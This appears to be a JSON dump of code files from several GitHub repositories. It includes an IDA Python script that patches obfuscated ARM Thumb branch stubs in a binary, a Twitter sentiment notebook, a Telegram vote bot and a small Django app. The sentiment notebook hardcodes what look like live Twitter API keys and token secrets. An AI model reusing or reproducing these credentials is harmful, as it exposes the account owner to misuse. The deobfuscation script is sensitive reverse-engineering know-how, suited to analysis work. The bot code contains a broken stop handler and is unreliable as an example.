inss.append(insn)\r\n return inss\r\n except CsError as e:\r\n return None\r\n\r\ndef cs_arm_thumb(code, offset=0x80000000):\r\n return cs_disasm(CS_ARCH_ARM, CS_MODE_THUMB, code, offset)\r\n\r\n\r\ndef cs_arm_arm(code, offset=0x80000000):\r\n return cs_disasm(CS_ARCH_ARM, CS_MODE_ARM, code, offset)\r\n\r\ndef plog(msg):\r\n print(msg)\r\n\r\ndef plogi(ea, msg):\r\n plog(\"[Info ] %08x : %s\" % (ea, msg))\r\n\r\ndef plogic(ea, msg):\r\n MakeCode(ea)\r\n plog(\"[Info ] %08x : %s\" % (ea, msg))\r\n\r\ndef plogw(ea, msg):\r\n plog(\"[Warn ] %08x : %s\" % (ea, msg))\r\n\r\ndef ploge(ea, msg):\r\n plog(\"[Error] %08x : %s\" % (ea, msg))\r\n\r\ndef align_down(x, size=4):\r\n return x & ~(size - 1)\r\n\r\ndef align_up(x, size=4):\r\n return (x + size - 1) & ~(size - 1)\r\n\r\ndef get_s8(val):\r\n if val < 0x80:\r\n return val\r\n else:\r\n return (val - 0x100)\r\n\r\ndef get_s16(val):\r\n if val < 0x8000:\r\n return val\r\n else:\r\n return (val - 0x10000)\r\n\r\ndef get_s24(val):\r\n if val < 0x800000:\r\n return val\r\n else:\r\n return (val - 0x1000000)\r\n\r\ndef get_s32(val):\r\n if val < 0x80000000:\r\n return val\r\n else:\r\n return (val - 0x100000000)\r\n\r\ndef getAdrRegValueT1(ins): #ADR Rd,# 10100dddmmmmmmmm Rd=(ddd) mmmmmmmm:'00'\r\n return ((ins & 0x0700) >> 8), ((ins & 0xff) << 2)\r\n\r\ndef getSubsRegValueT2(ins): #SUBS Rdn,#<imm8> 00111{nnn}{imm8}\r\n return ((ins & 0x0700) >> 8), (ins & 0xff)\r\n\r\ndef getAddsRegValueT2(ins): #ADDS Rdn,#<imm8> 00110{nnn}{imm8}\r\n return ((ins & 0x0700) >> 8), (ins & 0xff)\r\n\r\ndef getLdrRegValueT1(ins): #LDR Rn,#<imm8:'00'>\r\n return ((ins & 0x0700) >> 8), ((ins & 0xff) << 2)\r\n\r\ndef patchPushSubsAdds(ea):\r\n if get_wide_word(ea) == 0xb507 and get_wide_word(ea+18) == 0xbd07: #PUSH {R0-R2,LR} POP 
{R0-R2,PC}\r\n ins1 = get_wide_word(ea+2) #ADR Rn,#<imm8>\r\n ins2 = get_wide_word(ea+6) #SUBS Rn,#<imm8>\r\n ins3 = get_wide_word(ea+14) #ADDS Rn,#<imm8>\r\n ins4 = get_wide_word(ea+16) #STR Rn,[SP,#<imm8>]\r\n address = ea+4\r\n # ADR Rn,#imm1 STR Rn,[SP,#0xc] STR(T2):10010{ttt}{imm8} STR Rt,[sp,imm8:'00'}\r\n if (ins1 & 0xa800) == 0xa000 and (ins4 & 0xf8ff) == 0x9003:\r\n if (ins2 & 0xf800) == 0x3800 and (ins3 & 0xf800) == 0x3000: #SUBS ADDS\r\n reg1,imm1 = getAdrRegValueT1(ins1)\r\n reg2,imm2 = getSubsRegValueT2(ins2)\r\n reg3,imm3 = getAddsRegValueT2(ins3)\r\n if reg1 != 1 or reg2 != 1 or reg3 != 0:\r\n plogw(ea, \"reg umatch %d %d %d\" % (reg1, reg2, reg3))\r\n address += imm1\r\n address -= imm2\r\n address += imm3\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch push sub add\")\r\n else:\r\n ploge(ea,\" may be can patch by patchPushSubsAdds\")\r\n\r\ndef patch494c(ea):\r\n if get_wide_word(ea) == 0xb503: #PUSH {R0,R1,LR}\r\n ea1 = ea + 2\r\n if get_wide_word(ea1) == 0xbf00: #NOP\r\n ea1 += 2\r\n ins1 = get_wide_word(ea1)\r\n if (ins1 & 0xff00) == 0x4800: #LDR R0,=XX\r\n reg1,imm1 = getLdrRegValueT1(ins1) #LDR R0,\r\n index = get_wide_dword(align_up(ea1+2+imm1))\r\n ea1 += 2\r\n ins2 = get_wide_word(ea1)\r\n ins2_dw = get_wide_dword(ea1)\r\n table = None\r\n if (ins2 & 0xff00) == 0x4900: #LDR R1,=xxx\r\n ea1 +=2\r\n inss = cs_arm_thumb(get_bytes(ea1,4), ea1)\r\n if inss:\r\n if inss[0].operands[0].imm == 0x494c:\r\n table = ea1 + 4\r\n if table == None:\r\n ploge(ea, \"may be bl 494c,but not find BLX 494c\")\r\n elif (ins2_dw & 0xc000f800) == 0xc000f000: #BL T1 11110S{imm10} 11{j1}1{j2}{imm11} BLX T2 11110S{imm10H} 11{j1}0{j2}{imm10L}H\r\n inss = cs_arm_thumb(get_bytes(ea1,4), ea1)\r\n if inss:\r\n blInsEa = inss[0].operands[0].imm\r\n inss2 = cs_arm_thumb(get_bytes(blInsEa, 4), blInsEa)\r\n if inss2:\r\n if inss2[0].operands[0].imm == 0x494c:\r\n table = blInsEa + 4\r\n if table == None:\r\n ploge(ea, \"may be bl 494c,but find bl 494c error\")\r\n if table:\r\n offset = get_wide_dword(table + (index << 2))\r\n put_unconditional_branch(ea, table + offset)\r\n plogic(ea, \"patch BLX 494c\")\r\n\r\ndef patchPushAdrBLAddsPop(ea):\r\n ins1 = get_wide_word(ea)\r\n if (ins1 & 0xf700) == 0xb500 and (get_wide_word(ea+16) & 0xf7ff) == ins1: #PUSH {X-X,LR} POP {X-X,PC}\r\n if get_wide_dword(ea+6) == 0xf800f000: #BL 0\r\n ins2 = get_wide_word(ea+2)\r\n ins3 = get_wide_word(ea+10)\r\n if (ins3 & 0xf800) == 0x3000: #ADDS\r\n reg2,imm2 = getAdrRegValueT1(ins2)\r\n reg3,imm3 = getAddsRegValueT2(ins3)\r\n if reg2 != reg3:\r\n ploge(ea, \"may be Push BL 0 Pop,but reg not equal\")\r\n else:\r\n address = ea + 4 + imm2 + imm3\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch Push BL 0 Pop\")\r\n else:\r\n ploge(ea, \"may be Push BL 0 Pop\")\r\n\r\ndef patchPushAdrMovsBeqBne(ea):\r\n if (get_wide_word(ea) & 0xff00) == 0xb500:\r\n ins1 = get_wide_word(ea+12)\r\n ins2 = get_wide_word(ea+14)\r\n if (ins1 & 0xff00) == 0xd000 and (ins2 & 0xff00) == 0xd100: #BEQ BNE\r\n if (ins1 & 0xfe) == (ins2 & 0xfe): # BNE BEQ to same\r\n ins3 = get_wide_word(ea + 2) #ADR R4,\r\n ins4 = get_wide_word(ea + 4) #MOVS R5,#2\r\n ins5 = get_wide_word(ea + 6) #ADDS R5,#n\r\n reg3,imm3 = getAdrRegValueT1(ins3)\r\n if ins4 != 0x2502 or reg3 != 4 or (ins5 & 0xff00) != 0x3500:\r\n plogw(ea, \"may be Push Adr Movs Beq Bne but not ADR R4,#x MOVS R5,#n\")\r\n address = ea + 4 + imm3 + (ins4 & 0xff) + (ins5 & 0xff)\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch Push Adr Movs Beq 
Bne\")\r\n else:\r\n plogw(ea, \"may be Push Adr Movs Beq Bne\")\r\n\r\ndef patchSubPushBlx4964(ea):\r\n patches = {}\r\n # LDR(literal) T1 01001ttt{imm8} LDR Rt,<label> pc+imm8:'00'\r\n # LDR(immediate) T1 01101{imm5}nnnttt LDR Rt,[Rn{,#<imm>}] imm32=imm5:'00'\r\n # B T2 11100{imm11} B <label> imm32=imm11:'0'\r\n patches[0] = (0x01,0x48,0x00,0x68) #,0x02,0xe0\r\n patches[1] = (0x01,0x49,0x09,0x68) #,0x02,0xe0\r\n patches[2] = (0x01,0x4a,0x12,0x68) #,0x02,0xe0\r\n patches[3] = (0x01,0x4b,0x1b,0x68) #,0x02,0xe0\r\n patches[4] = (0x01,0x4c,0x24,0x68) #,0x02,0xe0\r\n patches[5] = (0x01,0x4d,0x2d,0x68) #,0x02,0xe0\r\n patches[6] = (0x01,0x4e,0x36,0x68) #,0x02,0xe0\r\n patches[7] = (0x01,0x4f,0x3f,0x68) #,0x02,0xe0\r\n # LDR(literal) T2 11111000 U1011111 tttt{imm12} LDR Rt,<label>\r\n # LDR(immediate) T3 11111000 1101nnnn tttt{imm12} LDR Rt,[Rn{,#<imm12>}]\r\n # B T2 11100{imm11} B <label> imm32=imm11:'0'\r\n patches[8] = (0xdf,0xf8,0x08,0x80,0xd8,0xf8,0x00,0x80) #,0x01,0xe0\r\n patches[9] = (0xdf,0xf8,0x08,0x90,0xd9,0xf8,0x00,0x90) #,0x01,0xe0\r\n patches[10] = (0xdf,0xf8,0x08,0xa0,0xda,0xf8,0x00,0xa0) #,0x01,0xe0\r\n patches[11] = (0xdf,0xf8,0x08,0xb0,0xdb,0xf8,0x00,0xb0) #,0x01,0xe0\r\n patches[12] = (0xdf,0xf8,0x08,0xc0,0xdc,0xf8,0x00,0xc0) #,0x01,0xe0\r\n patches[13] = (0xdf,0xf8,0x08,0xd0,0xdd,0xf8,0x00,0xd0) #,0x01,0xe0\r\n patches[14] = (0xdf,0xf8,0x08,0xe0,0xde,0xf8,0x00,0xe0) #,0x01,0xe0\r\n if get_wide_word(ea) == 0xb082 and get_wide_word(ea+2) == 0xb503: #SUB SP,SP,#8 PUSH {R0,R1,LR}\r\n ins1 = get_wide_dword(ea+4)\r\n if (ins1 & 0xc000f800) == 0xc000f000: # BL T1 11110S{imm10} 11{j1}1{j2}{imm11} BLX T2 11110S{imm10H} 11{j1}0{j2}{imm10L}H\r\n ea1 = ea + 4\r\n inss = cs_arm_thumb(get_bytes(ea1, 4), ea1)\r\n if inss:\r\n blInsEa = inss[0].operands[0].imm\r\n if blInsEa == 0x4964:\r\n if (get_wide_word(ea+12) & 0xff00) == 0xbc00: # POP {Rn}\r\n register = -1\r\n r = get_wide_byte(ea+12)\r\n for i in range(8):\r\n if r == (1 << i):\r\n register = i\r\n break\r\n if register == -1:\r\n ploge(ea, \"BLX 4964 register detect error:{%02x}\" % r)\r\n else:\r\n address = get_wide_dword(ea+8)+ea+8\r\n ea3 = ea\r\n if (ea3 % 4) == 0:\r\n patch_word(ea3, 0xbf00) # nop\r\n ea3 += 2\r\n for b in patches[register]:\r\n patch_byte(ea3, b)\r\n ea3 += 1\r\n if (ea3 - ea) == 4: #total:14\r\n patch_word(ea3, 0xe003) #BL 3*2+2 address+4\r\n elif (ea3 - ea) == 6: #total:14\r\n patch_word(ea3, 0xe002)\r\n else: #show not exist\r\n ploge(ea, \"patch BLX 4964 error\")\r\n return\r\n ea3 += 2\r\n patch_dword(ea3, address)\r\n plogic(ea, \"patch BLX 4964\")\r\n else:\r\n ins2 = get_wide_dword(ea+12)\r\n #LDR T4 11111000 0101nnnn tttt1PUW{imm8}\r\n if (ins2 & 0x0fffffff) == 0x0b04f85d: #LDR.w Rt,[sp],#4\r\n register = (ins2 >> 28) & 0x0f\r\n if register in patches:\r\n address = get_wide_dword(ea + 8) + ea + 8\r\n ea2 = ea\r\n if (ea2 % 4) == 0:\r\n patch_word(ea2, 0xbf00) #nop\r\n ea2 += 2\r\n for b in patches[register]:\r\n patch_byte(ea2, b)\r\n ea2 += 1\r\n if (ea2 - ea) == 8: #total:16\r\n patch_word(ea2, 0xe002)\r\n elif (ea2 - ea) == 10: #total:16\r\n patch_word(ea2, 0xe001)\r\n elif (ea2 - ea) == 4: # total:16\r\n patch_word(ea2, 0xe004) # BL 3*2+2 address+4\r\n elif (ea2 - ea) == 6: # total:16\r\n patch_word(ea2, 0xe003)\r\n else: # show not exist\r\n ploge(ea, \"patch BLX 4964 error\")\r\n return\r\n ea2 += 2\r\n patch_dword(ea2, address)\r\n plogic(ea, \"patch BLX 4964\")\r\n else:\r\n plogw(ea, \"BLX 4964 register error:{%d}\" % register)\r\n else:\r\n plogw(ea, \"may be like BLX 4964, but ldr 
unknown\")\r\n else:\r\n plogi(ea, \"may be like BLX 4964\")\r\n\r\ndef patchPushPushMovsAdd(ea):\r\n if (get_wide_word(ea) & 0xff00) == 0xb500 and (get_wide_word(ea+2) & 0xff00) == 0xb500: #PUSH {Rn-Rx,LR} PUSH {Rn-Rx,LR}\r\n ins1 = get_wide_word(ea+30) # STR R6,[R0,#24] T1 01100{imm5}nnnttt STR Rt,[Rn{,#<imm>}] imm32=imm5:'00'\r\n ins2 = get_wide_word(ea+32) # POP {R6} T1 1011110P{reg_list} POP <register>\r\n ins3 = get_wide_word(ea+34) # B\r\n if (ins1 & 0xf800) == 0x6000 and (ins2 & 0xff00) == 0xbc00 and (ins3 & 0xff00) == 0xe000:\r\n ins4 = get_wide_word(ea+20) # ADR R6,# T1 10100ddd{imm8} ADR Rd,<label> imm32=imm8:'00'\r\n ins5 = get_wide_word(ea+24) # MOVS R1,# T1 00100ddd{imm8} MOVS Rd,#imm8 imm32=ZeroExtend(imm8)\r\n ins6 = get_wide_word(ea+26) # ADDS R6,# T2 00110nnn{imm8} ADDS Rd,#imm8 imm32=ZeroExtend(imm8)\r\n if (ins4 & 0xff00) != 0xa600 or (ins5 & 0xff00) != 0x2100 or (ins6 & 0xff00) != 0x3600:\r\n plogw(ea, \"may be Push Push Movs Add\")\r\n address = ((ins4 & 0xff) << 2) + 4 + ea + 20 + 1\r\n address += (ins5 & 0xff) + (ins6 & 0xff)\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch Push Push Movs Add b %08x\" % address)\r\n\r\ndef patchPushBlBlPushAddAddAddPop(ea):\r\n if (get_wide_word(ea) & 0xff00) == 0xb500 and get_wide_dword(ea+10) == 0xf802f000 and get_wide_dword(ea+14) == 0xe800f000: #PUSH {,LR} bl 6 bl 0\r\n ins1 = get_wide_word(ea+2) # ADR R4,# T1 10100ddd{imm8} ADR Rd,<label> imm32=imm8:'00'\r\n ins2 = get_wide_word(ea+4) # SUBS R4,# T2 00111ddd{imm8} SUB Rd,#<imm8> imm32=imm8\r\n ins3 = get_wide_word(ea+24) # ADDS R0,R0,#4 T1 0001110{imm3}nnnddd ADDS Rd,Rn,#imm3\r\n ins4 = get_wide_word(ea+26) # ADDS R0,#0xc T2 00110ddd{imm8} ADDS Rd,#<imm8>\r\n ins5 = get_wide_word(ea+28) # ADDS R0,R0,#7 T1 0001110{imm3}nnnddd ADDS Rd,Rn,#imm3\r\n if (ins3 & 0xfe3f) != 0x1c00 or (ins4 & 0xff00) != 0x3000 or (ins5 & 0xfe3f) != 0x1c00:\r\n plogw(ea, \"may be Push BL BL Push Add Add Add Pop\")\r\n address = ((ins1 & 0xff) << 2) + ea + 4\r\n address -= ins2 & 0xff\r\n address += (ins3 >> 6) & 0x7\r\n address += ins4 & 0xff\r\n address += (ins5 >> 6) & 0x7\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch Push BL BL Push Add Add Add Pop b %08x\" % address)\r\n\r\ndef patchPushBlx4998(ea):\r\n if get_wide_word(ea) == 0xb503:\r\n ea1 = ea+2\r\n if get_wide_word(ea1) == 0xbf00: #NOP\r\n ea1 += 2\r\n ins1 = get_wide_dword(ea1)\r\n if (ins1 & 0xc000f800) == 0xc000f000: # BL T1 11110S{imm10} 11{j1}1{j2}{imm11} BLX T2 11110S{imm10H} 11{j1}0{j2}{imm10L}H\r\n inss = cs_arm_thumb(get_bytes(ea1, 4), ea1)\r\n if inss:\r\n if inss[0].operands[0].imm == 0x4998:\r\n address = get_s32(get_wide_dword(ea1+4)) + ea1 + 4\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch BLX 4998 b %08x\" % address)\r\n else:\r\n plogw(ea, \"like blx 4998\")\r\n else:\r\n plogw(ea, \"like blx 4998\")\r\n\r\ndef patchLdrRtLabel(ea, rt, label):\r\n offset = label - ea - 2\r\n if (offset > 4096) or (offset < -4096):\r\n raise RuntimeError(\"Invalid offset, LDR, Rt,label\")\r\n if offset >= 0:\r\n patch_byte(ea, 0xdf)\r\n else:\r\n patch_byte(ea, 0x5f)\r\n patch_byte(ea+1, 0xf8)\r\n patch_byte(ea+2, offset & 0xff)\r\n patch_byte(ea+3, ((offset >> 8) & 0xf) | (rt << 4))\r\n\r\ndef patchSubspPushBl4a04(ea): #todo no space\r\n if get_wide_word(ea) == 0xb083 and get_wide_word(ea+2) == 0xb503: # SUB SP,SP,#0xC PUSH {R0,R1,LR}\r\n ea1 = ea + 4\r\n if get_wide_word(ea1) == 0xbf00: # nop\r\n ea1 += 2\r\n ins1 = get_wide_dword(ea1)\r\n if (ins1 & 0xc000f800) == 0xc000f000: # BL T1 
11110S{imm10} 11{j1}1{j2}{imm11} BLX T2 11110S{imm10H} 11{j1}0{j2}{imm10L}H\r\n inss = cs_arm_thumb(get_bytes(ea1, 4), ea1)\r\n if inss:\r\n if inss[0].operands[0].imm == 0x4a04:\r\n address = get_s32(get_wide_dword(ea1+4)) + ea1 + 4\r\n patchLdrRtLabel(ea, 0, address)\r\n patchLdrRtLabel(ea+4, 1, address + 4)\r\n\r\npatch_start=0x0000\r\npatch_end=0x886e0\r\nfor ea in range(patch_start, patch_end):\r\n #patchPushSubsAdds(ea)\r\n #patch494c(ea)\r\n #patchPushAdrBLAddsPop(ea)\r\n #patchPushAdrMovsBeqBne(ea)\r\n #patchSubPushBlx4964(ea)\r\n #patchPushPushMovsAdd(ea)\r\n #patchPushBlBlPushAddAddAddPop(ea)\r\n\r\n #patchPushBlx4998(ea)\r\n pass\r\n\r\nea = here()\r\n\r\n\r\nprint(\"PatchBlukEnd\")"
},
{
"alpha_fraction": 0.694915235042572,
"alphanum_fraction": 0.7966101765632629,
"avg_line_length": 59,
"blob_id": "4ba7b96a9f3856b1c3e2723b0cdd2edca5f5c556",
"content_id": "6f5b53f1987f349d7449acd838bb860cedf2c466",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 59,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 1,
"path": "/readme.md",
"repo_name": "lin1man/sgmainRev",
"src_encoding": "UTF-8",
"text": "Practice for https://habr.com/en/company/drweb/blog/452076/"
}
] | 2 |
prnvambadi/Twitter-Sentiment_analysis | https://github.com/prnvambadi/Twitter-Sentiment_analysis | d0d2c588dd6b723af4ca9d8adc36464dbf0e19a4 | b3cdc735225c5eb2582f40023e94b412533162db | 4dc44e1afdbd984eeab12bca6ca6268d27d3b1c1 | refs/heads/master | 2023-06-10T06:36:12.617388 | 2021-07-01T03:29:12 | 2021-07-01T03:29:12 | 381,449,904 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.649782121181488,
"avg_line_length": 14.810344696044922,
"blob_id": "da574e0139e4b4c017db8644c843fe1701a8019b",
"content_id": "1eea141e975d04f1476116665c6800a22a75059a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3672,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 232,
"path": "/Sentimental.py",
"repo_name": "prnvambadi/Twitter-Sentiment_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[75]:\n\n\nfrom IPython.display import Image\nImage(filename='beef36fd707d.jpg')\n\n\n# ### Twitter Data Sentiment Analysis\n# - 1) Twitter Data:- First step is to configure twitter API and gather twitter data\n# - 2) Clean the data\n# - 3) Sentiment:- To find out sentiments\n# - 4) Analysis:- To do analysis\n\n# In[47]:\n\n\nimport tweepy \nfrom textblob import TextBlob #sentimnts library\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom wordcloud import WordCloud\nplt.style.use('fivethirtyeight')\n\n\n# In[2]:\n\n\nAPIKey=\"W2XtGXNhNK9M03XcEA9LLVa17\"\nAPISecretKey=\"J7wmwyKXxBfaOmn2LVtLloP28NJWcrUR6L2MQeqn8VFAjC6nQO\"\naccessToken=\"1387284148713234445-21fcTuPB6LTh6Zyi9Zxb5zxrxEIu8N\"\naccessTokenSecret=\"UK4vgiRYtjkev6c3JouvqXkv4Z0FQD3fsmbPYHPJFiItG\"\n\n\n# In[3]:\n\n\n### Authenticate\nauthenticate= tweepy.OAuthHandler(APIKey,APISecretKey)\nauthenticate.set_access_token(accessToken,accessTokenSecret)\napi=tweepy.API(authenticate)\n\n\n# In[4]:\n\n\nposts=api.user_timeline(screen_name='Trump',count=100,lang=\"en\",tweet_mode='extended')\ni=1\nfor tweet in posts[:10]:\n print(str(i)+')'+ tweet.full_text+'\\n')\n i=i+1\n\n\n# In[9]:\n\n\n# Create a dataframe with a column called tweets\ndf=pd.DataFrame([tweet.full_text for tweet in posts],columns=['Tweets'])\n\n\n# In[10]:\n\n\ndf\n\n\n# In[31]:\n\n\ndef cleanTxt(text):\n text=re.sub('@[a-zA-Z0-9]*','',text)\n text=re.sub(\"#\",'',text)\n text=re.sub('RT[\\s]+','',text)\n text=re.sub('https?:\\/\\/\\S+','',text)\n return text\n\n\n# In[32]:\n\n\ndf['Tweets']=df['Tweets'].apply(cleanTxt)\n\n\n# In[33]:\n\n\ndf\n\n\n# In[43]:\n\n\nanalysis=TextBlob(\"Today was the beautiful day\")\n\n\n# In[44]:\n\n\nanalysis.sentiment\n\n\n# In[34]:\n\n\n# create a function to get the subjectivity of all the tweets\ndef getSubject(text):\n return TextBlob(text).sentiment.subjectivity\n# create a function to get the Polarity of all the tweets\ndef getPolar(text):\n return TextBlob(text).sentiment.polarity\n\n#create columns subj and polar\ndf['Subjectivity']=df['Tweets'].apply(getSubject)\ndf['Polarity']=df['Tweets'].apply(getPolar)\n\n\n# In[48]:\n\n\ndf\n\n\n# # Do Analysis\n\n# In[35]:\n\n\n#WordCloud Visualization\nallwords = ''.join([i for i in df['Tweets']])\nCloud=WordCloud(random_state=0,max_font_size=100,width=500,height=300).generate(allwords)\nplt.imshow(Cloud)\nplt.show()\n\n\n# In[37]:\n\n\n# Create a fucntion to compute negative neutral postive comments\ndef getAnalysis(score):\n if score<0:\n return 'negative'\n elif score==0:\n return 'Neutral'\n else:\n return 'Positive'\ndf['Analysis']=df['Polarity'].apply(getAnalysis)\ndf\n\n\n# In[41]:\n\n\ndf[df['Analysis']=='negative']\n\n\n# In[42]:\n\n\ndf['Analysis'].value_counts()\n\n\n# In[53]:\n\n\n## plotting scatter plot\nfor i in range(0,df.shape[0]):\n plt.scatter(df['Polarity'][i],df['Subjectivity'][i],color='Blue')\n \nplt.title(\"Sentiment Analysis\")\nplt.xlim(-1,1)\nplt.xlabel('Polarity')\nplt.ylabel('Subjectivity')\nplt.figure(figsize=(8,6))\n\n\n# In[59]:\n\n\ndf['Analysis'].value_counts().plot(kind='bar')\n\nplt.title(\"Sentimental Analysis\")\nplt.xlabel('Polarity')\nplt.ylabel('Count')\nplt.show()\n\n\n# ### Only Positive tweets\n\n# In[65]:\n\n\ni=1\npostdf=df.sort_values(by=['Polarity'],ascending=False)\nfor j in range(0,postdf.shape[0]):\n if(postdf['Analysis'][j]=='Positive'):\n print(str(i)+')'+postdf['Tweets'][j])\n print()\n i=i+1\n\n\n# ### Only Negative Comments\n\n# 
In[67]:\n\n\ni=1\npostdf=df.sort_values(by=['Polarity'])\nfor j in range(0,postdf.shape[0]):\n if(postdf['Analysis'][j]=='negative'):\n print(str(i)+')'+postdf['Tweets'][j])\n print()\n i=i+1\n\n\n# ### Neutral Comments\n\n# In[69]:\n\n\ni=1\npostdf=df.sort_values(by=['Polarity'])\nfor j in range(0,postdf.shape[0]):\n if(postdf['Analysis'][j]=='Neutral'):\n print(str(i)+')'+postdf['Tweets'][j])\n print()\n i=i+1\n\n\n# In[ ]:\n\n\n\n\n"
}
] | 1 |
shlipenbah/holodilnik-vote | https://github.com/shlipenbah/holodilnik-vote | bbe023b992ee95ef088f4648842e8fa0626a349a | ff1b98e3e0a7e012f052f1739ca9fa6de44578ad | 5c2159b422a23eda1d8fb473f3f4e62b11fcc98e | refs/heads/master | 2020-03-22T08:13:22.161919 | 2018-07-04T20:18:46 | 2018-07-04T20:18:46 | 139,753,117 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.703281044960022,
"alphanum_fraction": 0.7068473696708679,
"avg_line_length": 32.19047546386719,
"blob_id": "0d61b47240d960c7fff3df843cc19279c0adccbc",
"content_id": "c8b030708aaebc6b6a961b895c06ca0368a3b1dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1402,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 42,
"path": "/holodilnik.py",
"repo_name": "shlipenbah/holodilnik-vote",
"src_encoding": "UTF-8",
"text": "import logging\nimport yaml\nfrom telegram.ext import Updater\nfrom telegram.ext import CommandHandler\n\n\nwith open('config.yml') as config:\n params = yaml.load(config)\n updater = Updater(token=params['token'])\n\n\ndef start(bot, update):\n bot.send_message(chat_id=update.message.chat_id, text=\"I'm a bot, please talk to me!\")\n\n\ndef stop():\n updater.stop()\n\n\ndef new_vote(bot, update, args):\n usage='You should specify [vote_name] [variant1] [variant2] and so on'\n if not args:\n bot.send_message(chat_id=update.message.chat_id, text=usage)\n elif len(args) in range(3):\n bot.send_message(chat_id=update.message.chat_id, text='Does only one variant make sense? {}'.format(usage))\n else:\n confirmation=\"You want to create a vote {} with {} variants, don't you?\".format(args[0], len(args) - 1)\n bot.send_message(chat_id=update.message.chat_id, text=confirmation)\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n# To add start command\ndispatcher = updater.dispatcher\nstart_handler = CommandHandler('start', start)\nvote_handler = CommandHandler('newvote', new_vote, pass_args=True)\nstop_handler = CommandHandler('stop', updater.stop())\ndispatcher.add_handler(start_handler)\ndispatcher.add_handler(vote_handler)\ndispatcher.add_handler(stop_handler)\n\n# To start the bot, run\nupdater.start_polling()\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.8103448152542114,
"alphanum_fraction": 0.8103448152542114,
"avg_line_length": 18.33333396911621,
"blob_id": "2c8a23fcd6fba877f7696317f542a98826be83b1",
"content_id": "eeb1e20c6f69d64b15e7124d8d1daea570f07452",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 3,
"path": "/README.md",
"repo_name": "shlipenbah/holodilnik-vote",
"src_encoding": "UTF-8",
"text": "# holodilnik-vote\nPython vote-bot for telegram\ndraft mode\n"
}
] | 2 |
injusticescorpio/add | https://github.com/injusticescorpio/add | 5aa7b6488a1960523c945f4d6cfa9fd0f07ebfc9 | 1c1dd71be9951433c50c73d12cc30d6f1f806230 | fbdd398bded812b6271d12c602b033242df47ea3 | refs/heads/master | 2023-01-22T01:49:20.635630 | 2020-11-27T15:54:15 | 2020-11-27T15:54:15 | 316,542,685 | 3 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5436720252037048,
"alphanum_fraction": 0.5490196347236633,
"avg_line_length": 27.049999237060547,
"blob_id": "d7057207923acd686c645bf55cb6d15734326f97",
"content_id": "ea4533594789c3e3603b7eb2c34e1c7102aaef48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 561,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 20,
"path": "/firstapp/templates/index.html",
"repo_name": "injusticescorpio/add",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html lang=\"en\" dir=\"ltr\">\n <head>\n <meta charset=\"utf-8\">\n <title></title>\n </head>\n <body>\n <h1>Add two numbers in Django</h1>\n <form class=\"\" action={%url 'basicapp:add'%} method=\"POST\">\n <label for=\"a\">Enter First Number:</label>\n    \n <input id=\"a\" type=\"text\" name=\"a\" value=\"\"><br><br>\n <label for=\"b\">Enter Second Number:</label>\n <input id=\"b\" type=\"text\" name=\"b\" value=\"\"><br><br>\n {% csrf_token %}\n <input type=\"submit\" name=\"\" value=\"submit\">\n </form>\n\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.7108433842658997,
"alphanum_fraction": 0.7108433842658997,
"avg_line_length": 15.600000381469727,
"blob_id": "ab05072c02a4f15198ae6c2e64ab1fe2d3856a48",
"content_id": "0ae6cc2450f97768d8af220ee7e0c7428259c005",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 166,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 10,
"path": "/firstapp/urls.py",
"repo_name": "injusticescorpio/add",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom firstapp import views\n\napp_name=\"basicapp\"\nurlpatterns = [\n\npath('',views.index,name=\"index\"),\npath('add/',views.add,name=\"add\")\n\n]\n"
},
{
"alpha_fraction": 0.6713286638259888,
"alphanum_fraction": 0.6783216595649719,
"avg_line_length": 21,
"blob_id": "52d76f9082404a0eff0bccf71c982e03720eba93",
"content_id": "f54c8c84d459aedd498eaca71189e058f9269108",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 286,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 13,
"path": "/firstapp/views.py",
"repo_name": "injusticescorpio/add",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n# Create your views here.\n\ndef index(request):\n return render(request,\"index.html\")\n\ndef add(request):\n val=request.POST.get('a')\n val2=request.POST.get('b')\n s=int(val)+int(val2)\n\n return render(request,\"add.html\",context={'sum':s})\n"
}
] | 3 |
bffred/afpa_meca | https://github.com/bffred/afpa_meca | 68451dde1534e8fa1cd3bd76f4652d7e4ae82c1d | 55c3d8783d45b8a2759ffdea79ade54439989422 | 3970f0c66fc5352c4b4c191031a61a792543d11d | refs/heads/master | 2020-03-27T03:11:41.303890 | 2018-08-21T12:45:44 | 2018-08-21T12:45:44 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7628361582756042,
"alphanum_fraction": 0.7628361582756042,
"avg_line_length": 25.40322494506836,
